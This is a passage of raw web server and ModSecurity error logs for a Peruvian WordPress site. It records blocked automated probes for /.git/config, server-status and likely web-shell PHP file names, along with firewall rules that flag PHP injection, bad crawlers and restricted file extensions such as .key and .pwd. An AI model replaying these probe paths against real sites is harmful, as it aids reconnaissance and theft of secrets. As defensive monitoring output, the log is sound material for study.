/usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php 2024/12/12 23:32:30 [error] 30272#30272: *446010 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/12 23:35:27 [error] 30271#30271: *446017 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/12/12 23:35:43 [error] 30271#30271: *446018 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/12/13 17:09:47 [error] 10744#10744: *457181 access forbidden by rule, client: 35.179.156.203, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/12/13 18:40:14 [error] 10744#10744: *458440 access forbidden by rule, client: 35.179.156.203, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/13 20:14:24 [error] 10744#10744: *459281 access forbidden by rule, client: 35.179.156.203, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Sat Dec 14 06:07:41.190700 2024] [authz_core:error] [pid 4637:tid 140085542459136] [client 209.38.248.17:57406] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/14 06:07:46 [error] 4598#4598: *471129 access forbidden by rule, client: 209.38.248.17, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Dec 14 06:32:13.208687 2024] [authz_core:error] [pid 4636:tid 140085651564288] [client 207.154.212.47:57976] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/14 06:32:18 [error] 4599#4599: *471520 access forbidden by rule, client: 207.154.212.47, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Dec 14 06:33:54.545021 2024] [autoindex:error] [pid 4635:tid 140085617993472] [client 52.172.192.103:58020] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/12/14 20:27:01 [error] 4598#4598: *485728 access forbidden by rule, client: 38.128.233.111, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/12/15 03:05:44 [error] 4599#4599: *491282 access forbidden by rule, client: 3.133.93.105, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Dec 15 03:14:58.107200 2024] [:error] [pid 3088:tid 140438409258752] [client 181.214.173.89:59052] [client 181.214.173.89] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/generator/data/generator.conf"] [unique_id "Z16QAjlvZXhU8gKRyiI9JQAAANA"] 2024/12/15 11:37:41 [error] 2773#2773: *498207 access forbidden by rule, client: 38.128.233.111, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/12/15 15:29:47 [error] 2773#2773: *501704 access forbidden by rule, client: 157.157.221.29, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Dec 15 21:31:40.717448 2024] [:error] [pid 2811:tid 140438518363904] [client 129.213.87.215:50788] [client 129.213.87.215] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-22.php"] [unique_id "Z1-RDDq7cOcIn3p0vOOSxwAAAIM"] [Sun Dec 15 21:31:54.187066 2024] [autoindex:error] [pid 3088:tid 140438609499904] [client 129.213.87.215:50860] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Sun Dec 15 21:32:10.885717 2024] [autoindex:error] [pid 3088:tid 140438442829568] [client 129.213.87.215:50914] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 15 21:32:47.347790 2024] [autoindex:error] [pid 2809:tid 140438342117120] [client 129.213.87.215:51386] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 15 21:32:47.725902 2024] [:error] [pid 3088:tid 140438367295232] [client 129.213.87.215:51390] [client 129.213.87.215] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:dstr. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/sample.php"] [unique_id "Z1-RTzlvZXhU8gKRyiJJkQAAANU"] [Sun Dec 15 21:32:47.738878 2024] [:error] [pid 3088:tid 140438459614976] [client 129.213.87.215:51392] [client 129.213.87.215] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:dstr. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/general.php"] [unique_id "Z1-RTzlvZXhU8gKRyiJJkgAAAMo"] [Sun Dec 15 21:33:33.234928 2024] [autoindex:error] [pid 2811:tid 140438392473344] [client 129.213.87.215:51594] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/smilies/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 15 21:33:33.258414 2024] [autoindex:error] [pid 2811:tid 140438609499904] [client 129.213.87.215:51596] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/codemirror/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 15 21:33:33.274878 2024] [autoindex:error] [pid 2811:tid 140438417651456] [client 129.213.87.215:51598] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 15 21:33:33.288356 2024] [autoindex:error] [pid 2811:tid 140438468007680] [client 129.213.87.215:51600] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/media/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 15 21:33:33.343882 2024] [autoindex:error] [pid 2811:tid 140438409258752] [client 129.213.87.215:51602] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 15 21:33:33.365351 2024] [autoindex:error] [pid 2811:tid 140438367295232] [client 129.213.87.215:51604] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/crystal/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 15 21:33:44.196406 2024] [autoindex:error] [pid 3088:tid 140438434436864] [client 129.213.87.215:51652] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/sunrise/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 15 21:33:55.765801 2024] [autoindex:error] [pid 3088:tid 140438392473344] [client 129.213.87.215:51692] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 15 21:33:55.801999 2024] [autoindex:error] [pid 3088:tid 140438451222272] [client 129.213.87.215:51694] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/themes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 15 21:34:01.805339 2024] [authz_core:error] [pid 2810:tid 140438493185792] [client 129.213.87.215:51714] AH01630: client denied by server configuration: /home/investig/public_html/wp-content/plugins/akismet/views/ [Sun Dec 15 21:34:01.843475 2024] [autoindex:error] [pid 3088:tid 140438442829568] [client 129.213.87.215:51716] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 15 21:34:01.882031 2024] [autoindex:error] [pid 3088:tid 140438601107200] [client 129.213.87.215:51718] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ocean/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Dec 15 21:34:20.810699 2024] [:error] [pid 2811:tid 140438367295232] [client 129.213.87.215:51826] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Dec 15 21:34:20.827608 2024] [:error] [pid 2811:tid 140438484793088] [client 129.213.87.215:51828] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php 2024/12/16 01:40:01 [error] 2772#2772: *517251 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/12/16 02:39:23 [error] 2772#2772: *517775 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/12/16 02:51:53 [error] 2773#2773: *517837 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Dec 16 03:05:45.754537 2024] [autoindex:error] [pid 3088:tid 140438468007680] [client 64.227.156.19:40084] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Dec 16 03:34:46.505202 2024] [:error] [pid 17430:tid 140112566732544] [client 38.252.239.77:40626] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentytwenty/functions.php:147 [Mon Dec 16 03:34:46.505287 2024] [:error] [pid 17430:tid 140112566732544] [client 38.252.239.77:40626] Stack trace: [Mon Dec 16 03:34:46.505301 2024] [:error] [pid 17430:tid 140112566732544] [client 38.252.239.77:40626] #0 {main} [Mon Dec 16 03:34:46.505390 2024] [:error] [pid 17430:tid 140112566732544] [client 38.252.239.77:40626] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/functions.php on line 147 [Mon Dec 16 04:33:40.920306 2024] [authz_core:error] [pid 18073:tid 140112327288576] [client 207.154.197.113:41888] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/16 04:33:46 [error] 17301#17301: *519160 access forbidden by rule, client: 207.154.197.113, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Dec 16 05:19:23.755681 2024] [authz_core:error] [pid 18073:tid 140112541554432] [client 68.183.9.16:42344] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/16 05:19:28 [error] 17301#17301: *519453 access forbidden by rule, client: 68.183.9.16, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/12/16 06:35:06 [error] 17301#17301: *519950 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/12/16 07:02:00 [error] 17302#17302: *520065 access forbidden by rule, client: 157.157.221.29, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/12/16 07:20:08 [error] 17302#17302: *520134 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Mon Dec 16 08:43:53.927520 2024] [:error] [pid 18073:tid 140112566732544] [client 129.213.87.215:45240] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Mon Dec 16 08:44:07.633838 2024] [:error] [pid 17431:tid 140112541554432] [client 129.213.87.215:45290] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Mon Dec 16 08:44:07.644027 2024] [:error] [pid 17431:tid 140112310503168] [client 129.213.87.215:45292] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Mon Dec 16 08:44:35.519274 2024] [:error] [pid 18073:tid 140112533161728] [client 129.213.87.215:45404] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Mon Dec 16 08:45:51.982757 2024] [:error] [pid 18073:tid 140112327288576] [client 129.213.87.215:45684] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Mon Dec 16 08:46:20.610292 2024] [:error] [pid 18073:tid 140112335681280] [client 129.213.87.215:45794] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/mariju.php 2024/12/16 12:59:21 [error] 17301#17301: *523510 access forbidden by rule, client: 212.90.63.78, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" [Mon Dec 16 21:36:03.258383 2024] [:error] [pid 17431:tid 140112352466688] [client 13.229.128.162:57672] [client 13.229.128.162] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "EmailWolf"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-emoji-release.min.js"] [unique_id "Z2DjkzFyvoX6SOwfDtcKjAAAAJE"] [Mon Dec 16 21:38:31.028681 2024] [:error] [pid 18073:tid 140112293717760] [client 13.229.128.162:57800] [client 13.229.128.162] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "Microsoft URL Control"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-emoji-release.min.js"] [unique_id "Z2DkJ5qGuUYChenYeXV9HQAAANg"] 2024/12/17 02:50:33 [error] 17301#17301: *531609 access forbidden by rule, client: 45.148.10.80, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/12/17 03:02:44 [error] 17302#17302: *531677 access forbidden by rule, client: 45.148.10.80, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/12/17 03:56:55 [error] 7348#7348: *532312 access forbidden by rule, client: 45.148.10.80, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Tue Dec 17 11:04:35.090464 2024] [autoindex:error] [pid 7383:tid 139799977457408] [client 159.65.152.68:44786] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/12/17 12:00:19 [error] 7348#7348: *537341 access forbidden by rule, client: 45.148.10.80, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Wed Dec 18 16:59:55.941118 2024] [authz_core:error] [pid 17120:tid 140612355467008] [client 206.81.24.74:37890] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/18 16:59:59 [error] 17081#17081: *547170 access forbidden by rule, client: 206.81.24.74, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Dec 18 19:39:06.920693 2024] [authz_core:error] [pid 20084:tid 140612372252416] [client 64.23.218.208:41892] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/18 19:39:11 [error] 20061#20061: *550221 access forbidden by rule, client: 64.23.218.208, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Dec 19 12:19:22.252514 2024] [:error] [pid 23180:tid 140309199517440] [client 38.252.239.77:58934] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentytwenty/functions.php:147 [Thu Dec 19 12:19:22.252616 2024] [:error] [pid 23180:tid 140309199517440] [client 38.252.239.77:58934] Stack trace: [Thu Dec 19 12:19:22.252634 2024] [:error] [pid 23180:tid 140309199517440] [client 38.252.239.77:58934] #0 {main} [Thu Dec 19 12:19:22.252759 2024] [:error] [pid 23180:tid 140309199517440] [client 38.252.239.77:58934] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/functions.php on line 147 [Thu Dec 19 15:21:16.801970 2024] [:error] [pid 23181:tid 140309300229888] [client 155.248.180.30:36608] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Thu Dec 19 15:21:31.441090 2024] [:error] [pid 23182:tid 140309417199360] [client 155.248.180.30:36678] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Thu Dec 19 15:21:31.594696 2024] [:error] [pid 23182:tid 140309191124736] [client 155.248.180.30:36680] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Thu Dec 19 15:22:04.277488 2024] [:error] [pid 10140:tid 140309450770176] [client 155.248.180.30:36836] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Thu Dec 19 15:23:09.986906 2024] [:error] [pid 23181:tid 140309325408000] [client 155.248.180.30:37080] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Thu Dec 19 15:23:31.455822 2024] [:error] [pid 23181:tid 140309433984768] [client 155.248.180.30:37150] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/mariju.php [Thu Dec 19 23:48:18.781879 2024] [authz_core:error] [pid 23182:tid 140309317015296] [client 167.71.81.114:49016] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/19 23:48:21 [error] 23040#23040: *573352 access forbidden by rule, client: 167.71.81.114, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Dec 20 02:02:51.977121 2024] [autoindex:error] [pid 10002:tid 140309333800704] [client 4.188.229.204:52340] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Dec 20 09:58:13.176054 2024] [authz_core:error] [pid 21206:tid 140515446941440] [client 206.189.2.13:59874] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/12/20 09:58:17 [error] 21164#21164: *580613 access forbidden by rule, client: 206.189.2.13, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Fri Dec 20 14:47:03.657991 2024] [autoindex:error] [pid 15216:tid 140515282478848] [client 204.10.194.61:38958] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Dec 20 14:47:49.002411 2024] [autoindex:error] [pid 14985:tid 140515446941440] [client 204.10.194.61:38984] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Dec 20 21:45:56.007312 2024] [:error] [pid 15320:tid 140515190159104] [client 54.169.156.171:47128] [client 54.169.156.171] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "EmailWolf"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionperu.com/wp-includes/js/jquery/jquery.min.js"] [unique_id "Z2Yr4yLf3q7E3czAdpOLrwAAAZY"] [Fri Dec 20 21:46:39.049391 2024] [:error] [pid 14985:tid 140515206944512] [client 54.169.156.171:47204] [client 54.169.156.171] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "Microsoft URL Control"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag 